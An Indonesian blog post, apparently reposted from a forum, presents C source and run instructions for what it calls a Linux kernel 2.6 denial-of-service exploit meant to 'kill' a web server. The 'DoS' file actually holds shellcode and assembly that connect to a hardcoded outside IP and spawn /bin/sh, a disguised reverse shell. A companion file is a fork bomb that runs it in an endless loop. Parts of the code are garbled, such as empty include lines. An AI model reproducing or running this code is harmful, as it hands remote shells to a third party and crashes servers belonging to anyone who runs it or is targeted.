Senin, 15 November 2010

Cara Kill 1 Server dengan Exploit

Bagi yg mao kill web 1 server bisa pake ini ja exploit buat dos bikinan ane si pemalas, syarat: server web kudu socket enabled (ga perlu bisa raw gapapa), kudu musti boleh ngefork

Local Kernel 2.6.x Denial Of Service Exploit with socket function and fork enabled
programmer : mywisdom (murder of odybx and cyber tank)
Download url: http://yoyoparty.com/upload/angela.tgz
Tested on:
- kernel 2.6.28
- kernel 2.6.21
- kernel 2.6.24
greetz:all jasakom crew, all devilzc0de crew, all ycl crew
special thanks:special thanks: gunslinger,peneter, peti mati,wendy182, v3n0m,flyv666,7460,cyber mutaqqin,comrade, and so on.
Cara pakai:
Code:
gcc -o angela angela.c
./angela &
(jika ingin dilakukan berulang ulang)
atau bisa juga begini:
Code:
gcc -o angela angela.c
./angela
source filenamedybxkill.c
Code:
//Local Kernel 2.6.x Denial of Service Exploit with socket enabled
//C0d3r: mywisdom ( murder of odybx and cyber tank )
//thanks: all jasakom crew, all devilzc0de crew, all ycl crew
//special thanks: gunslinger,peneter, peti mati, v3n0m,flyv666,7460,cyber mutaqqin and so on.
#include 
#include 
void peneter()
 {
 printf("\nOdybx Was Killed version 1.0 local kernel 2.6 dos sploit");
printf("\nFree provided by mywisdom creator of kiss of death technic\n");     
 printf("\nTrying to kill this server in minutes..please wait \n");     
 }     
 void xxx()
  {
   char esc = 27;
   printf("%c%s",esc,"[2J");
   printf("%c%s",esc,"[1;1H");
        
  }

void v3n0m()
 {
char socketz[] ="\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\"
"\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x68\"
"\x7c\x52\x9a\x79\x66\x68\x1a\x0b\"
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\"
"\x89\xe1\x89\xc6\x6a\x03\x5b\x6a\x66\x58"
"\xcd\x80\"
"\xbb\xb8\x01\xcd\x80";
        (*(void (*)()) socketz)();

 }     
 
void gunslinger()
      {
     __asm__ ("push   $0x66    \n\t"
"pop    %eax\n\t"
"push   $0x1\n\t"
"pop    %ebx\n\t"
"xor    %ecx,%ecx\n\t"
"push   %ecx\n\t"
"push   $0x1\n\t"
"push   $0x2\n\t"
"mov    %esp,%ecx\n\t"
"int    $0x80\n\t"
"push   $0x799a527c\n\t"
"pushw  $0x0b1a\n\t"
"pushw  $0x2\n\t"
"mov    %esp,%ecx\n\t"
"push   $0x10\n\t"
"push   %ecx\n\t"
"push   %eax\n\t"
"mov    %esp,%ecx\n\t"
"mov    %eax,%esi\n\t"
"push   $0x3\n\t"
"pop    %ebx\n\t"
"push   $0x66\n\t"
"pop    %eax\n\t"
"int    $0x80    \n\t"
"xchg   %esi,%ebx\n\t"
"push   $0x2\n\t"
"pop    %ecx\n\t"
"dup_loop:\n\t"
"mov    $0x3f,%al\n\t"
"int    $0x80\n\t"
"dec    %ecx\n\t"
"jns    dup_loop\n\t"
"mov    $0xb,%al\n\t"
"xor    %edx,%edx\n\t"
"push   %edx\n\t"
"push   $0x68732f2f\n\t"
"push   $0x6e69622f\n\t"
"mov    %esp,%ebx\n\t"
"push   %edx\n\t"
"push   %ebx\n\t"
"mov    %esp, %ecx\n\t"
"int    $0x80\n\t"
);

}

int main()
 { 
     xxx();
     int hack;
     int iseng;
     for (hack=1;;)
     {
        while (iseng<2)
        {
      peneter();
      v3n0m();
      gunslinger();
        }
    }
         
     return 0;
        
}
filename: angela.c
Code:
//Local Kernel 2.6.x with socket enabled Denial of Service Exploit
//C0d3r: mywisdom ( murder of odybx and cyber tank)
//testing main loop
// what the #### of race condition
#include 
int main()
 {
int hack;
system("gcc -o odybxkill odybxkill.c");
 for(hack=1;;)
      {
       system("./odybxkill &");          
          fork();
      }      
 
 }



sumber : http://www.jasakom.com/content.php?242-Cara-Kill-1-Server-dg-Exploit
Diposting oleh Niel di
Label: